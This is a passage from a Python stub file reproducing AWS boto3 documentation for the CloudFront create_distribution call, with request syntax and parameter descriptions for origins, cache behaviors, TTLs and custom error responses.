'CloudFrontOriginAccessIdentity': { 'Id': 'string', 'S3CanonicalUserId': 'string', 'CloudFrontOriginAccessIdentityConfig': { 'CallerReference': 'string', 'Comment': 'string' } }, 'Location': 'string', 'ETag': 'string' } """ pass def create_distribution(DistributionConfig=None): """ Creates a new web distribution. Send a POST request to the /*CloudFront API version* /distribution /distribution ID resource. See also: AWS API Documentation :example: response = client.create_distribution( DistributionConfig={ 'CallerReference': 'string', 'Aliases': { 'Quantity': 123, 'Items': [ 'string', ] }, 'DefaultRootObject': 'string', 'Origins': { 'Quantity': 123, 'Items': [ { 'Id': 'string', 'DomainName': 'string', 'OriginPath': 'string', 'CustomHeaders': { 'Quantity': 123, 'Items': [ { 'HeaderName': 'string', 'HeaderValue': 'string' }, ] }, 'S3OriginConfig': { 'OriginAccessIdentity': 'string' }, 'CustomOriginConfig': { 'HTTPPort': 123, 'HTTPSPort': 123, 'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only', 'OriginSslProtocols': { 'Quantity': 123, 'Items': [ 'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2', ] }, 'OriginReadTimeout': 123, 'OriginKeepaliveTimeout': 123 } }, ] }, 'DefaultCacheBehavior': { 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, 'CacheBehaviors': { 'Quantity': 123, 'Items': [ { 'PathPattern': 'string', 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, ] }, 'CustomErrorResponses': { 'Quantity': 123, 'Items': [ { 'ErrorCode': 123, 'ResponsePagePath': 'string', 'ResponseCode': 'string', 'ErrorCachingMinTTL': 123 }, ] }, 'Comment': 'string', 'Logging': { 'Enabled': True|False, 'IncludeCookies': True|False, 'Bucket': 'string', 'Prefix': 'string' }, 'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All', 'Enabled': True|False, 'ViewerCertificate': { 'CloudFrontDefaultCertificate': True|False, 'IAMCertificateId': 'string', 'ACMCertificateArn': 'string', 'SSLSupportMethod': 'sni-only'|'vip', 'MinimumProtocolVersion': 'SSLv3'|'TLSv1', 'Certificate': 'string', 'CertificateSource': 'cloudfront'|'iam'|'acm' }, 'Restrictions': { 'GeoRestriction': { 'RestrictionType': 'blacklist'|'whitelist'|'none', 'Quantity': 123, 'Items': [ 'string', ] } }, 'WebACLId': 'string', 'HttpVersion': 'http1.1'|'http2', 'IsIPV6Enabled': True|False } ) :type DistributionConfig: dict :param DistributionConfig: [REQUIRED] The distribution's configuration information. CallerReference (string) -- [REQUIRED]A unique value (for example, a date-time stamp) that ensures that the request can't be replayed. If the value of CallerReference is new (regardless of the content of the DistributionConfig object), CloudFront creates a new distribution. If CallerReference is a value you already sent in a previous request to create a distribution, and if the content of the DistributionConfig is identical to the original request (ignoring white space), CloudFront returns the same the response that it returned to the original request. If CallerReference is a value you already sent in a previous request to create a distribution but the content of the DistributionConfig is different from the original request, CloudFront returns a DistributionAlreadyExists error. Aliases (dict) --A complex type that contains information about CNAMEs (alternate domain names), if any, for this distribution. Quantity (integer) -- [REQUIRED]The number of CNAME aliases, if any, that you want to associate with this distribution. Items (list) --A complex type that contains the CNAME aliases, if any, that you want to associate with this distribution. (string) -- DefaultRootObject (string) --The object that you want CloudFront to request from your origin (for example, index.html ) when a viewer requests the root URL for your distribution (http://www.example.com ) instead of an object in your distribution (http://www.example.com/product-description.html ). Specifying a default root object avoids exposing the contents of your distribution. Specify only the object name, for example, index.html . Do not add a / before the object name. If you don't want to specify a default root object when you create a distribution, include an empty DefaultRootObject element. To delete the default root object from an existing distribution, update the distribution configuration and include an empty DefaultRootObject element. To replace the default root object, update the distribution configuration and specify the new object. For more information about the default root object, see Creating a Default Root Object in the Amazon CloudFront Developer Guide . Origins (dict) -- [REQUIRED]A complex type that contains information about origins for this distribution. Quantity (integer) -- [REQUIRED]The number of origins for this distribution. Items (list) --A complex type that contains origins for this distribution. (dict) --A complex type that describes the Amazon S3 bucket or the HTTP server (for example, a web server) from which CloudFront gets your files. You must create at least one origin. For the current limit on the number of origins that you can create for a distribution, see Amazon CloudFront Limits in the AWS General Reference . Id (string) -- [REQUIRED]A unique identifier for the origin. The value of Id must be unique within the distribution. When you specify the value of TargetOriginId for the default cache behavior or for another cache behavior, you indicate the origin to which you want the cache behavior to route requests by specifying the value of the Id element for that origin. When a request matches the path pattern for that cache behavior, CloudFront routes the request to the specified origin. For more information, see Cache Behavior Settings in the Amazon CloudFront Developer Guide . DomainName (string) -- [REQUIRED] Amazon S3 origins : The DNS name of the Amazon S3 bucket from which you want CloudFront to get objects for this origin, for example, myawsbucket.s3.amazonaws.com . Constraints for Amazon S3 origins: If you configured Amazon S3 Transfer Acceleration for your bucket, do not specify the s3-accelerate endpoint for DomainName . The bucket name must be between 3 and 63 characters long (inclusive). The bucket name must contain only lowercase characters, numbers, periods, underscores, and dashes. The bucket name must not contain adjacent periods. Custom Origins : The DNS domain name for the HTTP server from which you want CloudFront to get objects for this origin, for example, www.example.com . Constraints for custom origins: DomainName must be a valid DNS name that contains only a-z, A-Z, 0-9, dot (.), hyphen (-), or underscore (_) characters. The name cannot exceed 128 characters. OriginPath (string) --An optional element that causes CloudFront to request your content from a directory in your Amazon S3 bucket or your custom origin. When you include the OriginPath element, specify the directory name, beginning with a / . CloudFront appends the directory name to the value of DomainName , for example, example.com/production . Do not include a / at the end of the directory name. For example, suppose you've specified the following values for your distribution: DomainName : An Amazon S3 bucket named myawsbucket . OriginPath : /production CNAME : example.com When a user enters example.com/index.html in a browser, CloudFront sends a request to Amazon S3 for myawsbucket/production/index.html . When a user enters example.com/acme/index.html in a browser, CloudFront sends a request to Amazon S3 for myawsbucket/production/acme/index.html . CustomHeaders (dict) --A complex type that contains names and values for the custom headers that you want. Quantity (integer) -- [REQUIRED]The number of custom headers, if any, for this distribution. Items (list) -- Optional : A list that contains one OriginCustomHeader element for each custom header that you want CloudFront to forward to the origin. If Quantity is 0 , omit Items . (dict) --A complex type that contains HeaderName and HeaderValue elements, if any, for this distribution. HeaderName (string) -- [REQUIRED]The name of a header that you want CloudFront to forward to your origin. For more information, see Forwarding Custom Headers to Your Origin (Web Distributions Only) in the Amazon Amazon CloudFront Developer Guide . HeaderValue (string) -- [REQUIRED]The value for the header that you specified in the HeaderName field. S3OriginConfig (dict) --A complex type that contains information about the Amazon S3 origin. If the origin is a custom origin, use the CustomOriginConfig element instead. OriginAccessIdentity (string) -- [REQUIRED]The CloudFront origin access identity to associate with the origin. Use an origin access identity to configure the origin so that viewers can only access objects in an Amazon S3 bucket through CloudFront. The format of the value is: origin-access-identity/CloudFront/ID-of-origin-access-identity where `` ID-of-origin-access-identity `` is the value that CloudFront returned in the ID element when you created the origin access identity. If you want viewers to be able to access objects using either the CloudFront URL or the Amazon S3 URL, specify an empty OriginAccessIdentity element. To delete the origin access identity from an existing distribution, update the distribution configuration and include an empty OriginAccessIdentity element. To replace the origin access identity, update the distribution configuration and specify the new origin access identity. For more information about the origin access identity, see Serving Private Content through CloudFront in the Amazon CloudFront Developer Guide . CustomOriginConfig (dict) --A complex type that contains information about a custom origin. If the origin is an Amazon S3 bucket, use the S3OriginConfig element instead. HTTPPort (integer) -- [REQUIRED]The HTTP port the custom origin listens on. HTTPSPort (integer) -- [REQUIRED]The HTTPS port the custom origin listens on. OriginProtocolPolicy (string) -- [REQUIRED]The origin protocol policy to apply to your origin. OriginSslProtocols (dict) --The SSL/TLS protocols that you want CloudFront to use when communicating with your origin over HTTPS. Quantity (integer) -- [REQUIRED]The number of SSL/TLS protocols that you want to allow CloudFront to use when establishing an HTTPS connection with this origin. Items (list) -- [REQUIRED]A list that contains allowed SSL/TLS protocols for this distribution. (string) -- OriginReadTimeout (integer) --You can create a custom origin read timeout. All timeout units are in seconds. The default origin read timeout is 30 seconds, but you can configure custom timeout lengths using the CloudFront API. The minimum timeout length is 4 seconds; the maximum is 60 seconds. If you need to increase the maximum time limit, contact the AWS Support Center . OriginKeepaliveTimeout (integer) --You can create a custom keep-alive timeout. All timeout units are in seconds. The default keep-alive timeout is 5 seconds, but you can configure custom timeout lengths using the CloudFront API. The minimum timeout length is 1 second; the maximum is 60 seconds. If you need to increase the maximum time limit, contact the AWS Support Center . DefaultCacheBehavior (dict) -- [REQUIRED]A complex type that describes the default cache behavior if you do not specify a CacheBehavior element or if files don't match any of the values of PathPattern in CacheBehavior elements. You must create exactly one default cache behavior. TargetOriginId (string) -- [REQUIRED]The value of ID for the origin that you want CloudFront to route requests to when a request matches the path pattern either for a cache behavior or for the default cache behavior. ForwardedValues (dict) -- [REQUIRED]A complex type that specifies how CloudFront handles query strings and cookies. QueryString (boolean) -- [REQUIRED]Indicates whether you want CloudFront to forward query strings to the origin that is associated with this cache behavior and cache based on the query string parameters. CloudFront behavior depends on the value of QueryString and on the values that you specify for QueryStringCacheKeys , if any: If you specify true for QueryString and you don't specify any values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin and caches based on all query string parameters. Depending on how many query string parameters and values you have, this can adversely affect performance because CloudFront must forward more requests to the origin. If you specify true for QueryString and you specify one or more values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin, but it only caches based on the query string parameters that you specify. If you specify false for QueryString , CloudFront doesn't forward any query string parameters to the origin, and doesn't cache based on query string parameters. For more information, see Configuring CloudFront to Cache Based on Query String Parameters in the Amazon CloudFront Developer Guide . Cookies (dict) -- [REQUIRED]A complex type that specifies whether you want CloudFront to forward cookies to the origin and, if so, which ones. For more information about forwarding cookies to the origin, see How CloudFront Forwards, Caches, and Logs Cookies in the Amazon CloudFront Developer Guide . Forward (string) -- [REQUIRED]Specifies which cookies to forward to the origin for this cache behavior: all, none, or the list of cookies specified in the WhitelistedNames complex type. Amazon S3 doesn't process cookies. When the cache behavior is forwarding requests to an Amazon S3 origin, specify none for the Forward element. WhitelistedNames (dict) --Required if you specify whitelist for the value of Forward: . A complex type that specifies how many different cookies you want CloudFront to forward to the origin for this cache behavior and, if you want to forward selected cookies, the names of those cookies. If you specify all or none for the value of Forward , omit WhitelistedNames . If you change the value of Forward from whitelist to all or none and you don't delete the WhitelistedNames element and its child elements, CloudFront deletes them automatically. For the current limit on the number of cookie names that you can whitelist for each cache behavior, see Amazon CloudFront Limits in the AWS General Reference . Quantity (integer) -- [REQUIRED]The number of different cookies that you want CloudFront to forward to the origin for this cache behavior. Items (list) --A complex type that contains one Name element for each cookie that you want CloudFront to forward to the origin for this cache behavior. (string) -- Headers (dict) --A complex type that specifies the Headers , if any, that you want CloudFront to vary upon for this cache behavior. Quantity (integer) -- [REQUIRED]The number of different headers that you want CloudFront to forward to the origin for this cache behavior. You can configure each cache behavior in a web distribution to do one of the following: Forward all headers to your origin : Specify 1 for Quantity and * for Name . Warning If you configure CloudFront to forward all headers to your origin, CloudFront doesn't cache the objects associated with this cache behavior. Instead, it sends every request to the origin. Forward a whitelist of headers you specify : Specify the number of headers that you want to forward, and specify the header names in Name elements. CloudFront caches your objects based on the values in all of the specified headers. CloudFront also forwards the headers that it forwards by default, but it caches your objects based only on the headers that you specify. Forward only the default headers : Specify 0 for Quantity and omit Items . In this configuration, CloudFront doesn't cache based on the values in the request headers. Items (list) --A complex type that contains one Name element for each header that you want CloudFront to forward to the origin and to vary on for this cache behavior. If Quantity is 0 , omit Items . (string) -- QueryStringCacheKeys (dict) --A complex type that contains information about the query string parameters that you want CloudFront to use for caching for this cache behavior. Quantity (integer) -- [REQUIRED]The number of whitelisted query string parameters for this cache behavior. Items (list) --(Optional) A list that contains the query string parameters that you want CloudFront to use as a basis for caching for this cache behavior. If Quantity is 0, you can omit Items . (string) -- TrustedSigners (dict) -- [REQUIRED]A complex type that specifies the AWS accounts, if any, that you want to allow to create signed URLs for private content. If you want to require signed URLs in requests for objects in the target origin that match the PathPattern for this cache behavior, specify true for Enabled , and specify the applicable values for Quantity and Items . For more information, see Serving Private Content through CloudFront in the Amazon Amazon CloudFront Developer Guide . If you don't want to require signed URLs in requests for objects that match PathPattern , specify false for Enabled and 0 for Quantity . Omit Items . To add, change, or remove one or more trusted signers, change Enabled to true (if it's currently false ), change Quantity as applicable, and specify all of the trusted signers that you want to include in the updated distribution. Enabled (boolean) -- [REQUIRED]Specifies whether you want to require viewers to use signed URLs to access the files specified by PathPattern and TargetOriginId . Quantity (integer) -- [REQUIRED]The number of trusted signers for this cache behavior. Items (list) -- Optional : A complex type that contains trusted signers for this cache behavior. If Quantity is 0 , you can omit Items . (string) -- ViewerProtocolPolicy (string) -- [REQUIRED]The protocol that viewers can use to access the files in the origin specified by TargetOriginId when a request matches the path pattern in PathPattern . You can specify the following options: allow-all : Viewers can use HTTP or HTTPS. redirect-to-https : If a viewer submits an HTTP request, CloudFront returns an HTTP status code of 301 (Moved Permanently) to the viewer along with the HTTPS URL. The viewer then resubmits the request using the new URL. https-only : If a viewer sends an HTTP request, CloudFront returns an HTTP status code of 403 (Forbidden). For more information about requiring the HTTPS protocol, see Using an HTTPS Connection to Access Your Objects in the Amazon CloudFront Developer Guide . Note The only way to guarantee that viewers retrieve an object that was fetched from the origin using HTTPS is never to use any other protocol to fetch the object. If you have recently changed from HTTP to HTTPS, we recommend that you clear your objects' cache because cached objects are protocol agnostic. That means that an edge location will return an object from the cache regardless of whether the current request protocol matches the protocol used previously. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide . MinTTL (integer) -- [REQUIRED]The minimum amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon Amazon CloudFront Developer Guide . You must specify 0 for MinTTL if you configure CloudFront to forward all headers to your origin (under Headers , if you specify 1 for Quantity and * for Name ). AllowedMethods (dict) --A complex type that controls which HTTP methods CloudFront processes and forwards to your Amazon S3 bucket or your custom origin. There are three choices: CloudFront forwards only GET and HEAD requests. CloudFront forwards only GET , HEAD , and OPTIONS requests. CloudFront forwards GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests. If you pick the third choice, you may need to restrict access to your Amazon S3 bucket or to your custom origin so users can't perform operations that you don't want them to. For example, you might not want users to have permissions to delete objects from your origin. Quantity (integer) -- [REQUIRED]The number of HTTP methods that you want CloudFront to forward to your origin. Valid values are 2 (for GET and HEAD requests), 3 (for GET , HEAD , and OPTIONS requests) and 7 (for GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests). Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to process and forward to your origin. (string) -- CachedMethods (dict) --A complex type that controls whether CloudFront caches the response to requests using the specified HTTP methods. There are two choices: CloudFront caches responses to GET and HEAD requests. CloudFront caches responses to GET , HEAD , and OPTIONS requests. If you pick the second choice for your Amazon S3 Origin, you may need to forward Access-Control-Request-Method, Access-Control-Request-Headers, and Origin headers for the responses to be cached correctly. Quantity (integer) -- [REQUIRED]The number of HTTP methods for which you want CloudFront to cache responses. Valid values are 2 (for caching responses to GET and HEAD requests) and 3 (for caching responses to GET , HEAD , and OPTIONS requests). Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to cache responses to. (string) -- SmoothStreaming (boolean) --Indicates whether you want to distribute media files in the Microsoft Smooth Streaming format using the origin that is associated with this cache behavior. If so, specify true ; if not, specify false . If you specify true for SmoothStreaming , you can still distribute other content using this cache behavior if the content matches the value of PathPattern . DefaultTTL (integer) --The default amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. The value that you specify applies only when your origin does not add HTTP headers such as Cache-Control max-age , Cache-Control s-maxage , and Expires to objects. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide . MaxTTL (integer) -- Compress (boolean) --Whether you want CloudFront to automatically compress certain files for this cache behavior. If so, specify true ; if not, specify false . For more information, see Serving Compressed Files in the Amazon CloudFront Developer Guide . LambdaFunctionAssociations (dict) --A complex type that contains zero or more Lambda function associations for a cache behavior. Quantity (integer) -- [REQUIRED]The number of Lambda function associations for this cache behavior. Items (list) -- Optional : A complex type that contains LambdaFunctionAssociation items for this cache behavior. If Quantity is 0 , you can omit Items . (dict) --A complex type that contains a Lambda function association. LambdaFunctionARN (string) --The ARN of the Lambda function. EventType (string) --Specifies the event type that triggers a Lambda function invocation. Valid values are: viewer-request origin-request viewer-response origin-response CacheBehaviors (dict) --A complex type that contains zero or more CacheBehavior elements. Quantity (integer) -- [REQUIRED]The number of cache behaviors for this distribution. Items (list) --Optional: A complex type that contains cache behaviors for this distribution. If Quantity is 0 , you can omit Items . (dict) --A complex type that describes how CloudFront processes requests. You must create at least as many cache behaviors (including the default cache behavior) as you have origins if you want CloudFront to distribute objects from all of the origins. Each cache behavior specifies the one origin from which you want CloudFront to get objects. If you have two origins and only the default cache behavior, the default cache behavior will cause CloudFront to get objects from one of the origins, but the other origin is never used. For the current limit on the number of cache behaviors that you can add to a distribution, see Amazon CloudFront Limits in the AWS General Reference . If you don't want to specify any cache behaviors, include only an empty CacheBehaviors element. Don't include an empty CacheBehavior element, or CloudFront returns a MalformedXML error. To delete all cache behaviors in an existing distribution, update the distribution configuration and include only an empty CacheBehaviors element. To add, change, or remove one or more cache behaviors, update the distribution configuration and specify all of the cache behaviors that you want to include in the updated distribution. For more information about cache behaviors, see Cache Behaviors in the Amazon CloudFront Developer Guide . PathPattern (string) -- [REQUIRED]The pattern (for example, images/*.jpg ) that specifies which requests to apply the behavior to. When CloudFront receives a viewer request, the requested path is compared with path patterns in the order in which cache behaviors are listed in the distribution. Note You can optionally include a slash (/ ) at the beginning of the path pattern. For example, /images/*.jpg . CloudFront behavior is the same with or without the leading / . The path pattern for the default cache behavior is * and cannot be changed. If the request for an object does not match the path pattern for any cache behaviors, CloudFront applies the behavior in the default cache behavior. For more information, see Path Pattern in the Amazon CloudFront Developer Guide . TargetOriginId (string) -- [REQUIRED]The value of ID for the origin that you want CloudFront to route requests to when a request matches the path pattern either for a cache behavior or for the default cache behavior. ForwardedValues (dict) -- [REQUIRED]A complex type that specifies how CloudFront handles query strings and cookies. QueryString (boolean) -- [REQUIRED]Indicates whether you want CloudFront to forward query strings to the origin that is associated with this cache behavior and cache based on the query string parameters. CloudFront behavior depends on the value of QueryString and on the values that you specify for QueryStringCacheKeys , if any: If you specify true for QueryString and you don't specify any values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin and caches based on all query string parameters. Depending on how many query string parameters and values you have, this can adversely affect performance because CloudFront must forward more requests to the origin. If you specify true for QueryString and you specify one or more values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin, but it only caches based on the query string parameters that you specify. If you specify false for QueryString , CloudFront doesn't forward any query string parameters to the origin, and doesn't cache based on query string parameters. For more information, see Configuring CloudFront to Cache Based on Query String Parameters in the Amazon CloudFront Developer Guide . Cookies (dict) -- [REQUIRED]A complex type that specifies whether you want CloudFront to forward cookies to the origin and, if so, which ones. For more information about forwarding cookies to the origin, see How CloudFront Forwards, Caches, and Logs Cookies in the Amazon CloudFront Developer Guide . Forward (string) -- [REQUIRED]Specifies which cookies to forward to the origin for this cache behavior: all, none, or the list of cookies specified in the WhitelistedNames complex type. Amazon S3 doesn't process cookies. When the cache behavior is forwarding requests to an Amazon S3 origin, specify none for the Forward element. WhitelistedNames (dict) --Required if you specify whitelist for the value of Forward: . A complex type that specifies how many different cookies you want CloudFront to forward to the origin for this cache behavior and, if you want to forward selected cookies, the names of those cookies. If you specify all or none for the value of Forward , omit WhitelistedNames . If you change the value of Forward from whitelist to all or none and you don't delete the WhitelistedNames element and its child elements, CloudFront deletes them automatically. For the current limit on the number of cookie names that you can whitelist for each cache behavior, see Amazon CloudFront Limits in the AWS General Reference . Quantity (integer) -- [REQUIRED]The number of different cookies that you want CloudFront to forward to the origin for this cache behavior. Items (list) --A complex type that contains one Name element for each cookie that you want CloudFront to forward to the origin for this cache behavior. (string) -- Headers (dict) --A complex type that specifies the Headers , if any, that you want CloudFront to vary upon for this cache behavior. Quantity (integer) -- [REQUIRED]The number of different headers that you want CloudFront to forward to the origin for this cache behavior. You can configure each cache behavior in a web distribution to do one of the following: Forward all headers to your origin : Specify 1 for Quantity and * for Name . Warning If you configure CloudFront to forward all headers to your origin, CloudFront doesn't cache the objects associated with this cache behavior. Instead, it sends every request to the origin. Forward a whitelist of headers you specify : Specify the number of headers that you want to forward, and specify the header names in Name elements. CloudFront caches your objects based on the values in all of the specified headers. CloudFront also forwards the headers that it forwards by default, but it caches your objects based only on the headers that you specify. Forward only the default headers : Specify 0 for Quantity and omit Items . In this configuration, CloudFront doesn't cache based on the values in the request headers. Items (list) --A complex type that contains one Name element for each header that you want CloudFront to forward to the origin and to vary on for this cache behavior. If Quantity is 0 , omit Items . (string) -- QueryStringCacheKeys (dict) --A complex type that contains information about the query string parameters that you want CloudFront to use for caching for this cache behavior. Quantity (integer) -- [REQUIRED]The number of whitelisted query string parameters for this cache behavior. Items (list) --(Optional) A list that contains the query string parameters that you want CloudFront to use as a basis for caching for this cache behavior. If Quantity is 0, you can omit Items . (string) -- TrustedSigners (dict) -- [REQUIRED]A complex type that specifies the AWS accounts, if any, that you want to allow to create signed URLs for private content. If you want to require signed URLs in requests for objects in the target origin that match the PathPattern for this cache behavior, specify true for Enabled , and specify the applicable values for Quantity and Items . For more information, see Serving Private Content through CloudFront in the Amazon Amazon CloudFront Developer Guide . If you don't want to require signed URLs in requests for objects that match PathPattern , specify false for Enabled and 0 for Quantity . Omit Items . To add, change, or remove one or more trusted signers, change Enabled to true (if it's currently false ), change Quantity as applicable, and specify all of the trusted signers that you want to include in the updated distribution. Enabled (boolean) -- [REQUIRED]Specifies whether you want to require viewers to use signed URLs to access the files specified by PathPattern and TargetOriginId . Quantity (integer) -- [REQUIRED]The number of trusted signers for this cache behavior. Items (list) -- Optional : A complex type that contains trusted signers for this cache behavior. If Quantity is 0 , you can omit Items . (string) -- ViewerProtocolPolicy (string) -- [REQUIRED]The protocol that viewers can use to access the files in the origin specified by TargetOriginId when a request matches the path pattern in PathPattern . You can specify the following options: allow-all : Viewers can use HTTP or HTTPS. redirect-to-https : If a viewer submits an HTTP request, CloudFront returns an HTTP status code of 301 (Moved Permanently) to the viewer along with the HTTPS URL. The viewer then resubmits the request using the new URL. https-only : If a viewer sends an HTTP request, CloudFront returns an HTTP status code of 403 (Forbidden). For more information about requiring the HTTPS protocol, see Using an HTTPS Connection to Access Your Objects in the Amazon CloudFront Developer Guide . Note The only way to guarantee that viewers retrieve an object that was fetched from the origin using HTTPS is never to use any other protocol to fetch the object. If you have recently changed from HTTP to HTTPS, we recommend that you clear your objects' cache because cached objects are protocol agnostic. That means that an edge location will return an object from the cache regardless of whether the current request protocol matches the protocol used previously. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide . MinTTL (integer) -- [REQUIRED]The minimum amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon Amazon CloudFront Developer Guide . You must specify 0 for MinTTL if you configure CloudFront to forward all headers to your origin (under Headers , if you specify 1 for Quantity and * for Name ). AllowedMethods (dict) --A complex type that controls which HTTP methods CloudFront processes and forwards to your Amazon S3 bucket or your custom origin. There are three choices: CloudFront forwards only GET and HEAD requests. CloudFront forwards only GET , HEAD , and OPTIONS requests. CloudFront forwards GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests. If you pick the third choice, you may need to restrict access to your Amazon S3 bucket or to your custom origin so users can't perform operations that you don't want them to. For example, you might not want users to have permissions to delete objects from your origin. Quantity (integer) -- [REQUIRED]The number of HTTP methods that you want CloudFront to forward to your origin. Valid values are 2 (for GET and HEAD requests), 3 (for GET , HEAD , and OPTIONS requests) and 7 (for GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests). Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to process and forward to your origin. (string) -- CachedMethods (dict) --A complex type that controls whether CloudFront caches the response to requests using the specified HTTP methods. There are two choices: CloudFront caches responses to GET and HEAD requests. CloudFront caches responses to GET , HEAD , and OPTIONS requests. If you pick the second choice for your Amazon S3 Origin, you may need to forward Access-Control-Request-Method, Access-Control-Request-Headers, and Origin headers for the responses to be cached correctly. Quantity (integer) -- [REQUIRED]The number of HTTP methods for which you want CloudFront to cache responses. Valid values are 2 (for caching responses to GET and HEAD requests) and 3 (for caching responses to GET , HEAD , and OPTIONS requests). Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to cache responses to. (string) -- SmoothStreaming (boolean) --Indicates whether you want to distribute media files in the Microsoft Smooth Streaming format using the origin that is associated with this cache behavior. If so, specify true ; if not, specify false . If you specify true for SmoothStreaming , you can still distribute other content using this cache behavior if the content matches the value of PathPattern . DefaultTTL (integer) --The default amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. The value that you specify applies only when your origin does not add HTTP headers such as Cache-Control max-age , Cache-Control s-maxage , and Expires to objects. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide . MaxTTL (integer) --The maximum amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. The value that you specify applies only when your origin adds HTTP headers such as Cache-Control max-age , Cache-Control s-maxage , and Expires to objects. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide . Compress (boolean) --Whether you want CloudFront to automatically compress certain files for this cache behavior. If so, specify true; if not, specify false. For more information, see Serving Compressed Files in the Amazon CloudFront Developer Guide . LambdaFunctionAssociations (dict) --A complex type that contains zero or more Lambda function associations for a cache behavior. Quantity (integer) -- [REQUIRED]The number of Lambda function associations for this cache behavior. Items (list) -- Optional : A complex type that contains LambdaFunctionAssociation items for this cache behavior. If Quantity is 0 , you can omit Items . (dict) --A complex type that contains a Lambda function association. LambdaFunctionARN (string) --The ARN of the Lambda function. EventType (string) --Specifies the event type that triggers a Lambda function invocation. Valid values are: viewer-request origin-request viewer-response origin-response CustomErrorResponses (dict) --A complex type that controls the following: Whether CloudFront replaces HTTP status codes in the 4xx and 5xx range with custom error messages before returning the response to the viewer. How long CloudFront caches HTTP status codes in the 4xx and 5xx range. For more information about custom error pages, see Customizing Error Responses in the Amazon CloudFront Developer Guide . Quantity (integer) -- [REQUIRED]The number of HTTP status codes for which you want to specify a custom error page and/or a caching duration. If Quantity is 0 , you can omit Items . Items (list) --A complex type that contains a CustomErrorResponse element for each HTTP status code for which you want to specify a custom error page and/or a caching duration. (dict) --A complex type that controls: Whether CloudFront replaces HTTP status codes in the 4xx and 5xx range with custom error messages before returning the response to the viewer. How long CloudFront caches HTTP status codes in the 4xx and 5xx range. For more information about custom error pages, see Customizing Error Responses in the Amazon CloudFront Developer Guide . ErrorCode (integer) -- [REQUIRED]The HTTP status code for which you want to specify a custom error page and/or a caching duration. ResponsePagePath (string) --The path to the custom error page that you want CloudFront to return to a viewer when your origin returns the HTTP status code specified by ErrorCode , for example, /4xx-errors/403-forbidden.html . If you want to store your objects and your custom error pages in different locations, your distribution must include a cache behavior for which the following is true: The value of PathPattern matches the path to your custom error messages. For example, suppose you saved custom error pages for 4xx errors in an Amazon S3 bucket in a directory named /4xx-errors . Your distribution must include a cache behavior for which the path pattern routes requests for your custom error pages to that location, for example, /4xx-errors/* . The value of TargetOriginId 